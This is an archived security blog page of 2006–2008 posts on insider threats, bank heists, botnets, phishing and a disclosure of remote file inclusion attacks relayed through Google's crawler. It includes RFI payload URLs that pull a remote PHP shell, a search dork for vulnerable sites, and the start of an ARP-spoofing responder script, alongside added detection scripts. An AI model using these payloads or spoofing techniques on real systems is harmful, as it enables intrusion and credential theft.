Posted on May 3rd, 2008 by Aviram
Filed under: Funny, Corporate Security, Insider Threat | 1 Comment »
The Daily WTF has a good story that may sound a little too familiar to some:
How the aptly-named Super Hacker had managed to shut down the system remotely and provide a fix so quickly intrigued Kiefer. After poking around the network, he finally found the Python file that contained the Super Hacker’s fix:
#!/usr/bin/python
# Paying someone $10 to pull a power cord for $3500
print "(C) [Name Removed] 2008."
The moral of the story: when all else fails, use social engineering.
Posted on January 31st, 2008 by Juha-Matti
Filed under: Commentary, Physical Security, Corporate Security, Insider Threat | No Comments »
Bank robbers have found a very interesting technique.
From The Local article Police thwart remote-control bank heist:
Surprised last August to suddenly see his computer cursor moving on its own, the employee at the Knivsta branch of Swedbank, north of Stockholm, “discovered a cable connected to his computer linked to a remote control device fastened under his desk,” local police spokesman Christer Nordström told AFP.
The employee quickly pulled the plug, interrupting a transfer of several hundred million kronor, Nordström said.
And how did they manage to install this remote-control device? According to the news sources, during a break-in before the incident; no money had been stolen from the bank during that break-in.
A comment posted to Technocrat.net points to another interesting case (from a CIO Update article), confirmed as a keylogger case:
The story is still developing but this is what we know: Thieves masquerading as cleaning staff with the help of a security guard installed hardware keystroke loggers on computers within the London branch of Sumitomo Mitsui, a huge Japanese bank.
These computers evidently belonged to help desk personnel.
Swedbank is the leading bank in Sweden, Estonia, Latvia and Lithuania with more than 21,700 employees serving 9 million private and 480,000 corporate customers.
Posted on October 20th, 2007 by Shachar Shemesh
Filed under: Commentary, Insider Threat | 9 Comments »
This is a bit pointless, as I’m blogging about a “controversy” that has already been settled. I do think there are useful tools to take from this incident, though.
For those out of the loop, a few days ago players of online poker site “Absolute Poker” (no link, deal with it) accused a player called “POTRIPPER” of playing while being able to see the hole cards. I’ll spare the poker laymen the task of trying to figure out what that means (as I had to) - in that variant of poker some of the cards are shown, while others are hidden. People were accusing POTRIPPER of playing while being able to see everyone’s hidden cards.
I should point out that this is a settled controversy. Absolute Poker admitted that this is the work of an internal security breach. I am less interested in the specific case, however, than I am in looking at tools designed to answer the “how can we know” question. (more…)
Posted on August 25th, 2007 by gadi
Filed under: Web, Commentary, Full Disclosure, Spam, Law, Virus, Phishing, Corporate Security, Insider Threat, DDoS, Botnets, Networking, Rootkits | 1 Comment »
Following up on that strange title, ISOI 3 (Internet Security Operations and Intelligence), a workshop for do-ers who work on the security of the Internet and its users, is happening Monday and Tuesday in Washington, DC.
This time around we have even more government participation (we’re in DC, duh), but a bit less from academia (who can try and look at long-term solutions), alongside us security researchers and the operators (who respond to, contain and mitigate incidents).
I am very pleased with our progress on encouraging global cooperation, and getting more industry information sharing going. I am also happy we are moving from “just” good-will based relationships to the physical world with our efforts, being able to take things to the next level with world-wide operational task forces and, indeed, effecting change.
If you are interested in this realm of Internet security operations, take a look at ISOI 3’s schedule, and perhaps submit something for the next workshop.
Some reporters are somewhat annoyed that entrance is barred to them, but I hope they understand that although we make things public whenever we can, as full disclosure is a strong weapon in the fight against cyber crime, folks cannot share as openly when they have to be on their toes all the time.
The third ISOI is here because after DHS ended up unable to host it, sponsors emerged who were happy to assist:
Afilias Ltd.: http://www.afilias.info/
ICANN: http://www.icann.org/
The Internet Society: http://www.isoc.org/
Shinkuro, Inc.: http://www.shinkuro.com/
It’s going to be an interesting next week here at the swamp. Attendees better show up with their two forms of ID.
Gadi Evron,
ge@linuxbox.org.
Posted on August 14th, 2007 by gadi
Filed under: Commentary, Culture, Cisco, Virus, Corporate Security, Insider Threat, DDoS, Botnets, Networking | No Comments »
I posted a column on eWeek on what critical infrastructure means, looking back at the Estonia incident.
They edited out some of what I had to say on home computers and their impact as a critical infrastructure, but hey, word limitations.
http://www.eweek.com/article2/0,1895,2166125,00.asp
Gadi Evron,
ge@linuxbox.org.
Posted on July 11th, 2007 by gadi
Filed under: Web, Commentary, Spam, Culture, Virus, Phishing, Corporate Security, Insider Threat, Botnets | 2 Comments »
In the past two weeks, ecards became a major threat.
Ecards (or electronic greeting cards) were always a perfect social engineering scheme, open for abuse. With the Storm worm and massive exploitation, I believe it has become prudent to filter out all ecard messages in your email systems.
Further, some training or awareness information on this subject distributed to your organizations could be very useful.
Gadi Evron,
ge@linuxbox.org
Posted on July 8th, 2007 by gadi
Filed under: Web, Commentary, Spam, Virus, Phishing, Corporate Security, Insider Threat, DDoS, Botnets, Networking | 1 Comment »
Syngress was kind enough to allow me to post the chapter I wrote for Botnets: The Killer Web Application here as a free sample.
It is the third chapter in the book, and requires some prior knowledge of what a botnet C&C (command and control) is. It is basic, short, and to my belief covers quite a bit. It had to be short, as I had just 5 days to write it while doing other things, and not planning on any writing, but it is pretty good in my completely unbiased opinion.
You can download it from this link:
http://www.beyondsecurity.com/whitepapers/005_427_Botnet_03.pdf
For the full book, you would need to spend the cash.
Enjoy!
Gadi Evron,
ge@linuxbox.org.
Posted on June 1st, 2007 by gadi
Filed under: Web, Commentary, Spam, Physical Security, Corporate Security, Insider Threat, Interviews, DDoS, Botnets, Networking | 2 Comments »
People have been wondering why I’ve been keeping quiet on this issue, especially since I was right there helping out.
A lot of people had information to share and emotions to get out of the way. Also, it was really not my place to reply on this - with all the work done by the Estonians, my contributions were secondary. Mr. Alexander Harrowell discussed this with me off mailing lists, and our discussions are public on his blog. Information from Bill Woodcock on NANOG was also sound.
As to what actually happened over there, more information should become available soon and I will send it here. I keep getting stuck when trying to write the post-mortem and attack/defense analysis as I keep hitting a stone wall I did not expect: strategy. Suggestions for the future are also a part of that document, so I will speed it up with a more down-to-Earth technical analysis (which is what I promised CERT-EE).
In the past I’ve been able to consider information warfare as a part of a larger strategy, utilizing it as a weapon. I was able to think of impact and tools, not to mention (mostly) disconnected attacks and defenses.
I keep seeing strategy for the use IN information warfare battles as I write this document on what happened in Estonia, and I believe I need more time to explore this against my previous take on the issue, as well as take a look at some classics such as Clausewitz, as posh as it may sound.
Thanks,
Gadi Evron,
ge@linuxbox.org.
Posted on May 30th, 2007 by gadi
Filed under: Web, Microsoft, Commentary, Spam, Culture, Virus, Phishing, Corporate Security, Insider Threat | No Comments »
Many of us have been having discussions and arguments over whether the recent BBB phishing attacks are targeted or not.
Thinking on this, I believe a better equivalent, which may solve our terminology disagreements over whether these BBB phishing emails were targeted or not, is the tried concept of “targeted spam”. We can assume, although in some cases incorrectly, that spam is bulk.
Usually, spam goes to harvested “lists” of addresses. Sometimes it is targeted to a certain audience. But there are other types of lists, not just of addresses and interests.
It is possible to buy lists of addresses of people who attended RSA and visited booths, for example. Or any other number of trade-shows. It is possible to harvest LinkedIn, etc.
My take is that this attack is targeted in the sense that it goes to certain individual types only, but is quite mundane and bulk in type.
We need terms for individual/close-to attacks and attacks by targeting an audience, still in bulk.
Gadi Evron,
ge@linuxbox.org.
Posted on April 12th, 2007 by gadi
Filed under: Web, Commentary, Full Disclosure, Spam, Culture, Virus, Phishing, Corporate Security, Insider Threat, DDoS, Botnets, Networking | No Comments »
Support Intelligence releases daily reports on different Fortune 500 companies which are heavily affected by the botnet problem, with many compromised machines on their networks.
You can find more information on their blog:
http://blog.support-intelligence.com/
They are good people, and they know botnets.
Gadi Evron,
ge@linuxbox.org.
Posted on March 13th, 2007 by Juha-Matti
Filed under: Web, Commentary, Physical Security, Corporate Security, Insider Threat | No Comments »
The recent Times Online report Al-Qaeda plot to bring down UK internet shows that massive terrorism operations are still being prepared. The target was the headquarters of Telehouse Europe located in Docklands, London.
Reportedly
The discovery led Eliza Manningham-Buller, head of MI5, to set up the Centre for the Protection of National Infrastructure last month. It is a special MI5 unit…
There are several Internet Exchange Points in London, but we don’t know if this was the only target being planned.
What is the CPNI? The unit was founded on 1st February, and there is no NISCC (National Infrastructure Security Co-ordination Centre) any more.
It appears that Telehouse Docklands has detailed
Posted on December 23rd, 2006 by gadi
Filed under: Web, Microsoft, Commentary, Spam, Law, Culture, Virus, Physical Security, Phishing, Corporate Security, Insider Threat, DDoS, Botnets, Networking, Rootkits | 3 Comments »
A few months back I released a post on where I think anti-botnets technology is heading. Now it’s time for what happened in 2006, and what we can expect from here on.
I am not a believer in such retrospective looks, as often, they are completely biased and based on what we have seen and what we want to see. This is why I will try and limit myself to what we know happens and is likely to get attention, as well as what we have seen tried by bad guys, which is working for them enough to take to the next level.
What changed with botnets in 2006:
1. Botnets reached a level where it is unclear today what parts of the Internet are not compromised to an extent. Count by clean rather than infected.
2. Botnets have become the most significant platform from which virtually any type of online attack and crime are launched. Botnets equal an online infrastructure for abusive or criminal activity online.
3. In the past year, botnets have become mainstream. From a non-existent field even in the professional realm up to a few years ago, where attacks were happening constantly regardless, it has turned into the main buzzword and occupation of the security industry today, directly and indirectly.
4. Websites have returned to being one of the most significant forms of infection for building botnets, which hadn’t been the case since the late 90s.
5. Botnets have become the moving force behind organized crime online, with a low-risk high-profit calculation.
6. New technologies are finally being introduced, moving the botnet controllers from using just (or mainly) IRC to more advanced C&C (command and control) channels such as P2P, or multi-layered, such as DNS and IRC on the OSI model.
7. Botnets used to be a game of quantity. Today, when quantity is assured, quality is becoming a high concern for botnet controllers, both in type of bot as well as in abilities.
What’s going to happen with botnets in 2007:
Botnets won’t change. All will remain the same as it has been for years. Awareness, however, will increase, making the problem appear larger and larger, perhaps approaching its real scale. The bad guys would utilize their infrastructure to get more out of the bots (quality once quantity is here) and be able to do more than just steal cash, maximizing their revenue.
Further, more and more attackers unrelated to the botnet controllers will make use of already compromised systems and existing botnets to gain access to networks, to facilitate anything from corporate espionage and intelligence gathering, to shameless and open shows of strength to those who oppose them (think Blue Security), in the real world as well as the cyber one (which to the mob is one and the same, it’s the income that speaks).
Meaning, the existing botnets infrastructure will be utilized both in an open fashion, due to the fact online miscreants (real-world mob) face virtually no risk, as well as quiet and secretive uses for third-party intelligence operations.
Gadi Evron,
ge@linuxbox.org.
Posted on November 23rd, 2006 by noam
Filed under: Web, Commentary, Virus, Google, Corporate Security, Insider Threat, Botnets, Rootkits | 22 Comments »
Google can be utilized to hack into websites - actively exploiting them (not information gathering by the use of “Google hacking”, although that is how most of the sites vulnerable to RFI attacks are found).
By placing a URL on any web page, Google will find it, visit it and then index it. With this mechanism, it is possible to anonymize attacks on third party web sites through Google by the use of its crawler.
PoC -
A malicious web page is constructed by an attacker, containing a URL built like so:
1. Third party site URI to attack.
2. File inclusion exploit.
3. Second URI containing a malicious PHP shell.
Example URL:
http://victim-site/RFI-exploit?http://URI-with-malicious-code.php
Google will harvest this URL, visit the site using its crawler and index it.
Meaning it accesses the target site with the URL it was provided, exploiting it unwittingly on behalf of whoever planted it. It’s a feature, not a bug.
This is currently exploited in the wild. For example, try searching Google for:
inurl:cmd.gif
And note, as an example:
www.toomuchcookies.net/index.php?s=http:/%20/xpl.netmisphere2.com/CMD.gif?cmd
Which is no longer vulnerable. The %20 seems out of place, but this is how it is shown in the search.
Why use a botnet when one can abuse the Google crawler, which is allowed on most web sites?
Notes:
1. This attack was verified on Google, but there is no reason why it should not work with other search engines, web crawlers and web spiders.
2. File inclusions seem to tie in well with this attack anonymizer, but there is no reason why other attack types can’t be used in a similar fashion.
3. The feature might also be used to anonymize communication, as a covert channel.
Noam Rathaus.
(with thanks to Gadi Evron and Lev Toger)
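A detection-side example, added here and not part of the original post: the attack arrives at the victim as an ordinary request whose parameter value is itself a URL, so the web server log is where it shows up. The script below scans constructed Apache access-log lines for such parameters and flags them regardless of a crawler user agent; the hostnames and paths are placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-format access log lines (made up for this
# example; the hosts and paths are placeholders, not real sites).
SAMPLE_LOG = """\
66.249.0.1 - - [23/Nov/2006:10:01:02 +0000] "GET /index.php?s=http://example.invalid/cmd.gif?cmd HTTP/1.1" 200 512 "-" "Googlebot/2.1"
10.0.0.5 - - [23/Nov/2006:10:01:03 +0000] "GET /index.php?s=about HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.6 - - [23/Nov/2006:10:01:04 +0000] "GET /page.php?inc=http:/%20/example.invalid/shell.txt HTTP/1.1" 200 77 "-" "Mozilla/5.0"
10.0.0.7 - - [23/Nov/2006:10:01:05 +0000] "GET /img/logo.gif HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')
# A parameter value that is itself a URL is the signature of a remote file
# inclusion attempt; the scheme is matched after percent-decoding and
# whitespace removal so the odd "http:/%20/" form seen in search results
# also trips it.
REMOTE_RE = re.compile(r'^(?:https?|ftp):/+', re.IGNORECASE)


def remote_inclusion_params(path):
    """Return (name, value) pairs of query parameters whose value is a remote URL."""
    hits = []
    for name, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        cleaned = "".join(value.split())  # parse_qsl already percent-decoded it
        if REMOTE_RE.match(cleaned):
            hits.append((name, cleaned))
    return hits


def scan_log(text):
    """One finding per request carrying a remote-URL parameter, crawler or not."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, method, path, status, agent = m.groups()
        hits = remote_inclusion_params(path)
        if not hits:
            continue
        findings.append({
            "client": client,
            "method": method,
            "path": path,
            "params": hits,
            # A crawler user agent is not grounds to ignore the request: the
            # crawler only relays a URL that somebody else planted.
            "via_crawler": any(w in agent.lower() for w in ("bot", "spider", "crawler")),
            "served_ok": status == "200",
        })
    return findings
```

On the PHP side the matching mitigation is to disable allow_url_include (and allow_url_fopen where it is not needed), so that an included URL is never fetched at all.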
Posted on November 13th, 2006 by Kfir
Filed under: Web, Microsoft, Corporate Security, Insider Threat | 4 Comments »
Earlier this year, Beyond Security’s beSIRT released an incident response forensic analysis of a defacement attack by Team Evil [Team Evil Incident (Cyber-terrorism defacement analysis and response)].
The PDF itself can be found here:
http://www.beyondsecurity.com/besirt/advisories/team-evil-incident.pdf
A follow up is being released today, on a second incident. Following what Team Evil did, their methodology and how it changed since the first document was released.
The aim of this document is more to show how such analysis is done, on an educational note. The PDF can be found here:
http://www.beyondsecurity.com/besirt/advisories/teamevil-incident2.pdf
We hope you find this useful.
Kfir.
Posted on November 10th, 2006 by noam
Filed under: Full Disclosure, Physical Security, Corporate Security, Insider Threat, Networking | 4 Comments »
Sitting at a security conference in Boston, I wrote down a quick and dirty script that just listens for ARP requests and responds to any such request with … Hey, That is Me ™
… The things you can find using that… here is a summary:
1) SNMP community names
2) SMB keypairs (you need to use fakesmb)
3) DNS queries (if you answer them it is even more fun)
4) HTTP requests for odd stuff (once you answered the DNS queries, and have set Apache to answer incoming connections you are all set)
I am sure a lot more can be done… I will leave it to your imagination
#!/usr/bin/perl
# Written by Noam Rathaus, Beyond Security (r)
use Net::Pcap;
my $Interface = "eth1";
(more…)
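A defender’s counterpart to this responder, as an added example that is not part of the original post: a passive check over constructed ARP reply records that flags an IP answered by more than one MAC, a MAC answering for implausibly many IPs (which is exactly what an answer-everything responder does), and known hosts answered by the wrong MAC. The KNOWN_HOSTS table and the reply records are assumptions made up for the example.

```python
from collections import defaultdict

# Constructed ARP reply records (seconds, sender IP, sender MAC) as a passive
# sniffer on the segment would record them; made up for this example.
SAMPLE_REPLIES = [
    (0.0, "192.168.1.1", "00:11:22:33:44:01"),
    (0.1, "192.168.1.1", "00:11:22:33:44:99"),   # a second MAC answers for the gateway
    (0.2, "192.168.1.20", "00:11:22:33:44:99"),  # ...and for every other address asked for
    (0.3, "192.168.1.21", "00:11:22:33:44:99"),
    (0.4, "192.168.1.22", "00:11:22:33:44:99"),
    (0.5, "192.168.1.30", "00:11:22:33:44:30"),
]

# Assumed static table of addresses the defender has recorded, e.g. the gateway.
KNOWN_HOSTS = {"192.168.1.1": "00:11:22:33:44:01"}


def analyse_arp(replies, known=KNOWN_HOSTS, max_ips_per_mac=3):
    """Return three dicts of suspicious ARP activity:
    conflicts: IPs answered by more than one MAC
    greedy:    MACs claiming more IPs than a normal host would, which is
               what a script answering every ARP request looks like
    spoofed:   known IPs answered by a MAC other than the recorded one
    """
    ip_to_macs = defaultdict(set)
    mac_to_ips = defaultdict(set)
    spoofed = defaultdict(set)
    for _, ip, mac in replies:
        ip_to_macs[ip].add(mac)
        mac_to_ips[mac].add(ip)
        if ip in known and known[ip] != mac:
            spoofed[ip].add(mac)
    conflicts = {ip: sorted(m) for ip, m in ip_to_macs.items() if len(m) > 1}
    greedy = {mac: sorted(i) for mac, i in mac_to_ips.items() if len(i) > max_ips_per_mac}
    return conflicts, greedy, {ip: sorted(m) for ip, m in spoofed.items()}
```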